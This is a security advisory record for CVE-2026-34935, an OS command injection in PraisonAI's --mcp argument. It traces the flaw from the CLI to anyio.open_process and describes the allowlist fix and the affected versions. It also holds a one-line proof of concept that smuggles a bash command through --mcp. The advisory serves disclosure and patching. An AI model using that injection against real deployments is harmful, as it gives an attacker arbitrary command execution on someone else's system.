GHSA-9gm9-c8mq-vq7m

Source

https://github.com/advisories/GHSA-9gm9-c8mq-vq7m

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-9gm9-c8mq-vq7m/GHSA-9gm9-c8mq-vq7m.json

JSON Data

https://api.osv.dev/v1/vulns/GHSA-9gm9-c8mq-vq7m

Aliases

CVE-2026-34935

Published

2026-04-01T23:20:00Z

Modified

2026-04-06T23:06:06.266177Z

Severity

9.8 (Critical) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVSS Calculator

Summary

PraisonAI: OS Command Injection in MCPHandler.parse_mcp_command()

Details

Summary

The --mcp CLI argument is passed directly to shlex.split() and forwarded through the call chain to anyio.open_process() with no validation, allowlist check, or sanitization at any hop, allowing arbitrary OS command execution as the process user.

Details

cli/features/mcp.py:61 (source) -> praisonaiagents/mcp/mcp.py:345 (hop) -> mcp/client/stdio/__init__.py:253 (sink)

# source
parts = shlex.split(command)

# hop
cmd, args, env = self.parse_mcp_command(command, env_vars)
self.server_params = StdioServerParameters(command=cmd, args=arguments)

# sink
process = await anyio.open_process([command, *args])

Fixed in commit 47bff65413beaa3c21bf633c1fae4e684348368c (v4.5.69) by introducing a command allowlist:

ALLOWED_COMMANDS = {"npx", "uvx", "node", "python"}
if cmd not in ALLOWED_COMMANDS:
    raise ValueError(f"Disallowed command: {cmd}")

PoC

# tested on: praisonai==4.5.48
# install: pip install praisonai==4.5.48
# run: praisonai --mcp "bash -c 'id > /tmp/pwned'"
# verify: cat /tmp/pwned
# expected output: uid=1000(...) gid=1000(...) groups=1000(...)

Impact

Any deployment where the --mcp argument is influenced by untrusted input is exposed to full OS command execution as the process user. No authentication is required.

Database specific

{
    "cwe_ids": [
        "CWE-78"
    ],
    "github_reviewed": true,
    "severity": "CRITICAL",
    "github_reviewed_at": "2026-04-01T23:20:00Z",
    "nvd_published_at": "2026-04-03T23:17:05Z"
}

References

Affected packages

PyPI / praisonai

Package

Name: praisonai; View open source insights on deps.dev
Purl: pkg:pypi/praisonai

Affected ranges

Type: ECOSYSTEM
Events: Introduced

4.5.15

Fixed

4.5.69

Affected versions

4.*

4.5.15

4.5.16

4.5.18

4.5.19

4.5.20

4.5.21

4.5.22

4.5.23

4.5.24

4.5.25

4.5.26

4.5.27

4.5.28

4.5.29

4.5.30

4.5.31

4.5.32

4.5.33

4.5.34

4.5.35

4.5.36

4.5.37

4.5.38

4.5.39

4.5.40

4.5.41

4.5.42

4.5.43

4.5.44

4.5.45

4.5.46

4.5.48

4.5.49

4.5.51

4.5.52

4.5.54

4.5.55

4.5.56

4.5.57

4.5.58

4.5.59

4.5.60

4.5.62

4.5.63

4.5.64

4.5.65

4.5.67

4.5.68

Database specific

last_known_affected_version_range

"<= 4.5.68"

source

"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-9gm9-c8mq-vq7m/GHSA-9gm9-c8mq-vq7m.json"